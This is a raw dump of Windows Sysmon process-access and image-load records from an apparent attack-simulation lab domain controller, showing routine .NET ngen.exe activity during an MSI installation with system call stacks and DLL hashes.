14:57:21.655{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-200C-00000000BB01}5640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073904Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.655{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-200C-00000000BB01}5640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073903Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.655{A7A01FEF-EBD1-607E-200C-00000000BB01}5640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073902Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.639{A7A01FEF-EBD1-607E-210C-00000000BB01}70484504C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-200C-00000000BB01}5640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073901Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.624{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-210C-00000000BB01}7048C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073900Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.624{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-200C-00000000BB01}5640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073899Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.624{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-200C-00000000BB01}5640c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073898Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.608{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073897Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.608{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073896Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.608{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073895Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.593{A7A01FEF-EBD1-607E-1F0C-00000000BB01}30007136C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073894Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.593{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1F0C-00000000BB01}3000C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073893Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.577{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073892Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.577{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-1E0C-00000000BB01}6324c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073891Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.577{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073890Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.577{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073889Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.577{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073888Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.546{A7A01FEF-EBD1-607E-1D0C-00000000BB01}48885952C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073887Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.546{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1D0C-00000000BB01}4888C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073886Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.546{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073885Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.546{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-1C0C-00000000BB01}4020c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073884Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.530{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073883Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.530{A7A01FEF-B624-607E-0B00-00000000BB01}860908C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073882Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.530{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeC:\Windows\SysWOW64\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=34A9F9DAEE26461B55530C53F503C379,SHA256=B1F1A125B0F8B0C314647BD0A9180FFEDC21EA2C4699B0DAC4F84BE26EDD9A05,IMPHASH=EBE95B59B3B2C846CFC2203F3084575CtrueMicrosoft WindowsValid 10341000x800000000000000073881Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.514{A7A01FEF-EBD1-607E-1B0C-00000000BB01}60846232C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073880Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.499{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1B0C-00000000BB01}6084C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073879Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.499{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000073878Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.499{A7A01FEF-EB7F-607E-9D0B-00000000BB01}50764740c:\Windows\syswow64\MsiExec.exe{A7A01FEF-EBD1-607E-1A0C-00000000BB01}4144c:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+4f2c(wow64)|C:\Windows\Installer\MSIBB7C.tmp+122f(wow64)|C:\Windows\System32\msi.dll+a8e33(wow64)|C:\Windows\System32\msi.dll+180886(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000073877Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.483{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-180C-00000000BB01}6700c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000073876Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.483{A7A01FEF-B624-607E-0B00-00000000BB01}8605576C:\Windows\system32\lsass.exe{A7A01FEF-EBD1-607E-180C-00000000BB01}6700c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 734700x800000000000000073875Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.483{A7A01FEF-EBD1-607E-180C-00000000BB01}6700C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exeC:\Windows\System32\taskschd.dll10.0.14393.4169 (rs1_release.210107-1130)Task Scheduler COM APIMicrosoft® Windows® Operating SystemMicrosoft Corporationtaskschd.dllMD5=A0180EEE2521DC7847458E0BDC673DBD,SHA256=987A1EA9876E266B68CBB962BECF4BDD8794765DED0ED15B55490A30ED00DD2B,IMPHASH=2C7BF5CADC559377391AFDF385763E3CtrueMicrosoft WindowsValid 10341000x800000000000000073874Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:57:21.468{A7A01FEF-EBD1-607E-190C-00000000BB01}49244040C:\Windows\system32\conhost.exe{A7A01FEF-EBD1-607E-180C-00000000BB01}6700c:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 